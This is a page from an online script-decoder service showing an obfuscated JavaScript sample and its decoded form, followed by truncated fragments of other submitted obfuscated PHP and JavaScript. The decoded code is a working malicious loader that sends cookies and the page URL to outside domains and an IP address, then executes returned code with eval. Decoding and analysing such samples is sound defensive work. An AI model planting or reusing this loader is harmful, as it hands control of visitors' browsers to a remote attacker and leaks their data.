Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 54={\'29\':[\'//57.81\',\'//57.65\',\'66://67.98.82.68\'],\'37\':\'/69.70\',\'5\':\'72\',\'60\':40};23 47(){2 3;10{3=25 62("73.58")}8(11){10{3=25 62("77.58")}8(78){3=40}}6(!3&&64 49!=\'79\'){3=25 49()}26 3};23 19(27){2 5=" "+53.5;2 36=" "+27+"=";2 44=14;2 15=0;2 22=0;6(5.12>0){15=5.43(36);6(15!=-1){15+=36.12;22=5.43(";",15);6(22==-1){22=5.12}44=76(5.75(15,22))}}26(44)};23 20(27,48,24,30,32,39){53.5=27+"="+71(48)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((32)?"; 32="+32:"")+((39)?"; 39":"")};(23(7){2 18=19(7[\'5\']);6(18==14)18=0;2 34=19(7[\'5\']+\'80\');6(34==14)34=\'[]\';2 28=19(7[\'5\']+\'45\');6(28==14)28=\'[]\';2 41=\'74=\'+18.55()+\'&83=\'+42(59.97.102)+\'&103=\'+42(34)+\'&104=\'+42(28);2 17=0;2 50=7[\'29\'][17]+7[\'37\'];2 3=47();3.51(\'52\',50,38);3.105("107-101","108/109-110-111-112");3.113=23(){6(3.106==4){6(3.100!=84){++17;6(17>=7[\'29\'].12)26;99=38;3.51(\'52\',7[\'29\'][17]+7[\'37\'],38);3.56(41)}96{10{6(3.63.12==0)26;2 21=35.61(3.63);2 31=\'\';2 16=0;2 46=40;10{31=21[\'95\']}8(11){}10{16=21[\'94\']}8(11){}10{46=(21[\'93\']==1)}8(11){}7[\'60\']=46;6(31.12>0){2 13=25 92();13.91(13.90()+1);6(16>0){20(7[\'5\']+\'89\',16.55(),13.33())}10{20(7[\'5\']+\'88\',21[\'87\'],13.33())}8(11){}6(18==0){20(7[\'5\'],\'1\',13.33())}2 9=14;10{9=35.61(19(7[\'5\']+\'45\'))}8(11){}6(9==14)9=[];6(9.43(16)==-1)9[9.12]=1*16;20(7[\'5\']+\'45\',35.86(9),13.33());59.85(31)}}8(11){}}}};3.56(41)})(54);',10,114,'||var|xmlhttp||cookie|if|vAdsObj|catch|vM|try|e|length|vDate|null|offset|iT|iUrlInd|iStatus|getCookie|setCookie|Response|end|function|expires|new|return|name|sMS|url|path|sCode|domain|toUTCString|sMA|JSON|search|gate|true|secure|false|sPayload|encodeURIComponent|indexOf|setStr|_ms|bM|getXmlHttp|value|XMLHttpRequest|sUrl|open|POST|document|vXAdsObj|toString|send|uads|XMLHTTP|window|mobile|parse|ActiveXObject|responseText|typeof|buzz|http|141|232|g|php|escape|xads_platf|Msxml2|s|substring|unescape|Microsoft|E|undefined|_ma|life||u|200|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|m|t|c|else|location||bByIp|status|type|href|ma|ms|setRequestHeader|readyState|Content|application|x|www|form|urlencoded|onreadystatechange'.split('|'),0,{}))

Decrypted code:

var vXAdsObj=
	{
	'url':['//uads.life','//uads.buzz','http://141.98.82.232'],'gate':'/g.php','cookie':'xads_platf','mobile':false
};
function getXmlHttp()
	{
	var xmlhttp;
	try
		{
		xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
	}
	catch(e)
		{
		try
			{
			xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
		}
		catch(E)
			{
			xmlhttp=false
		}
	}
	if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
		{
		xmlhttp=new XMLHttpRequest()
	}
	return xmlhttp
};
function getCookie(name)
	{
	var cookie=" "+document.cookie;
	var search=" "+name+"=";
	var setStr=null;
	var offset=0;
	var end=0;
	if(cookie.length>0)
		{
		offset=cookie.indexOf(search);
		if(offset!=-1)
			{
			offset+=search.length;
			end=cookie.indexOf(";
			",offset);
			if(end==-1)
				{
				end=cookie.length
			}
			setStr=unescape(cookie.substring(offset,end))
		}
	}
	return(setStr)
};
function setCookie(name,value,expires,path,domain,secure)
	{
	document.cookie=name+"="+escape(value)+((expires)?";
	 expires="+expires:"")+((path)?";
	 path="+path:"")+((domain)?";
	 domain="+domain:"")+((secure)?";
	 secure":"")
};
(function(vAdsObj)
	{
	var iStatus=getCookie(vAdsObj['cookie']);
	if(iStatus==null)iStatus=0;
	var sMA=getCookie(vAdsObj['cookie']+'_ma');
	if(sMA==null)sMA='[]';
	var sMS=getCookie(vAdsObj['cookie']+'_ms');
	if(sMS==null)sMS='[]';
	var sPayload='s='+iStatus.toString()+'&u='+encodeURIComponent(window.location.href)+'&ma='+encodeURIComponent(sMA)+'&ms='+encodeURIComponent(sMS);
	var iUrlInd=0;
	var sUrl=vAdsObj['url'][iUrlInd]+vAdsObj['gate'];
	var xmlhttp=getXmlHttp();
	xmlhttp.open('POST',sUrl,true);
	xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
	xmlhttp.onreadystatechange=function()
		{
		if(xmlhttp.readyState==4)
			{
			if(xmlhttp.status!=200)
				{
				++iUrlInd;
				if(iUrlInd>=vAdsObj['url'].length)return;
				bByIp=true;
				xmlhttp.open('POST',vAdsObj['url'][iUrlInd]+vAdsObj['gate'],true);
				xmlhttp.send(sPayload)
			}
			else
				{
				try
					{
					if(xmlhttp.responseText.length==0)return;
					var Response=JSON.parse(xmlhttp.responseText);
					var sCode='';
					var iT=0;
					var bM=false;
					try
						{
						sCode=Response['c']
					}
					catch(e)
						{
					}
					try
						{
						iT=Response['t']
					}
					catch(e)
						{
					}
					try
						{
						bM=(Response['m']==1)
					}
					catch(e)
						{
					}
					vAdsObj['mobile']=bM;
					if(sCode.length>0)
						{
						var vDate=new Date();
						vDate.setYear(vDate.getFullYear()+1);
						if(iT>0)
							{
							setCookie(vAdsObj['cookie']+'_t',iT.toString(),vDate.toUTCString())
						}
						try
							{
							setCookie(vAdsObj['cookie']+'_fp',Response['fp'],vDate.toUTCString())
						}
						catch(e)
							{
						}
						if(iStatus==0)
							{
							setCookie(vAdsObj['cookie'],'1',vDate.toUTCString())
						}
						var vM=null;
						try
							{
							vM=JSON.parse(getCookie(vAdsObj['cookie']+'_ms'))
						}
						catch(e)
							{
						}
						if(vM==null)vM=[];
						if(vM.indexOf(iT)==-1)vM[vM.length]=1*iT;
						setCookie(vAdsObj['cookie']+'_ms',JSON.stringify(vM),vDate.toUTCString());
						window.eval(sCode)
					}
				}
				catch(e)
					{
				}
			}
		}
	};
	xmlhttp.send(sPayload)
}
)(vXAdsObj);

Recent submissions:

<?php goto p52s0; p52s0: defined("\x42\101\x53\x45\120\101\124\x48") or die("\x4e\x6f\x2... $MKfFXiWX4="\x73\x74\x72\x5F\x72\x6F\x74\x31\x33";$iIeNR8xXJjKL1="\x67\x7A\x69\x6E\x66\x6C... <?php defined("\x42\101\x53\x45\120\101\x54\x48") or die("\116\x6f\x20\x64\151\x72\145\1... <?php $SkrLvb = "wogyh0xbc317e_PVTNESHBAZGSMfiruaQkDud2Yt105NFmjcpllwz9v6qKRX4J8"; $XYq... <?php SkrLvb = "wogyh0xbc317e_PVTNESHBAZGSMfiruaQkDud2Yt105NFmjcpllwz9v6qKRX4J8"; -$XY... eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){... "\x68\x74\x74p\x73://f\x65ng-sh\x6f\x74.\x78\x79z/\x68i/p\x67/?c\x65\x6e="... echo"\x20 \x20\x3c\x6c\x69\x6ek\x20\x72\x65\x6c\x3d\"\x61m\x70\x68tml\x22 hre\x66\x3d\"\x... <!-- cs\x72f\x20--\x3e\n\x20\x20 \x3c\x6deta\x20n\x61\x6d\x65\x3d\"X-\x43S\x52F-T\x4fK\x4... \n \x20\x20 \x20 \x20 aq.\x70ush({\n \x20 \x20 \x20 \x20\x20 \x20\x20 \x20 \x2...